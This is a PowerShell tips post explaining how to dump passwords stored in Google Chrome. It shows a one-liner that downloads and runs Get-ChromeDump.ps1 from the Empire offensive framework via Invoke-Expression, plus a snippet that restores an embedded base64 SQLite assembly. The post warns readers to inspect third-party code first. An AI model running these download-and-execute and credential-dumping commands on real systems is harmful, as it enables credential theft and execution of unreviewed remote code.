In the previous tip we illustrated how you can dump all passwords from your personal Windows Password Vault. The same is true for basically any password manager as these programs are designed to return the passwords they store for you.

Google Chrome browsers store your personal passwords (and website history) in a SQLLite database. PowerShell can easily access this database and dump the information for you. To be able to do this, though, PowerShell needs specific SQLLite assemblies that are not part of Windows.

The code below shows how you can (a) download massive amounts of code via a one-liner and (b) embed a binary .NET assembly in the downloaded code.

Warning: run this code only on demo machines, or make sure you download the code first and examine it closely before you run it. The code is downloaded from a 3rd party source, and you *never* know whether such code contains malicious content.

If you like the idea of dumping Chrome secrets, we suggest you download the code on a safe machine, quarantine and examine it, then use it from a local saved copy whenever you need it. Never download and execute code from untrusted sources without double-checking what the code actually does:

# download the code from GitHub
$url = 'https://raw.githubusercontent.com/adaptivethreat/Empire/master/data/module_source/collection/Get-ChromeDump.ps1'
$code = Invoke-RestMethod -Uri $url -UseBasicParsing
# run the code
Invoke-Expression $code

# now you have a new function called Get-ChromeDump
Get-ChromeDump 

Note that the SQLLite database is locked while Chrome is running. You need to close down Chrome before you can dump its secrets.

The fact that code comes from an unknown or untrusted source does not mean the code is bad. In fact, when you look at the code, you’ll discover interesting techniques:

# download the code from GitHub
$url = 'https://raw.githubusercontent.com/adaptivethreat/Empire/master/data/module_source/collection/Get-ChromeDump.ps1'
# and copy it to the clipboard
Invoke-RestMethod -Uri $url -UseBasicParsing | Set-ClipBoard

# now paste the code into your editor of choice and inspect it!

As you’ll see, the code ships with the binary .NET assembly required to access SQLLite databases. The binary is base64-encoded as a string. This is the part that restores the binary on your computer:

$content = [System.Convert]::FromBase64String($assembly) 
$assemblyPath = "$($env:LOCALAPPDATA)\System.Data.SQLite.dll" 
Add-Type -Path $assemblyPath

Here are more security-related PowerShell one-liners: https://chrishales.wordpress.com/2018/01/03/powershell-password-one-liners/


Twitter This Tip! ReTweet this Tip!

Anonymous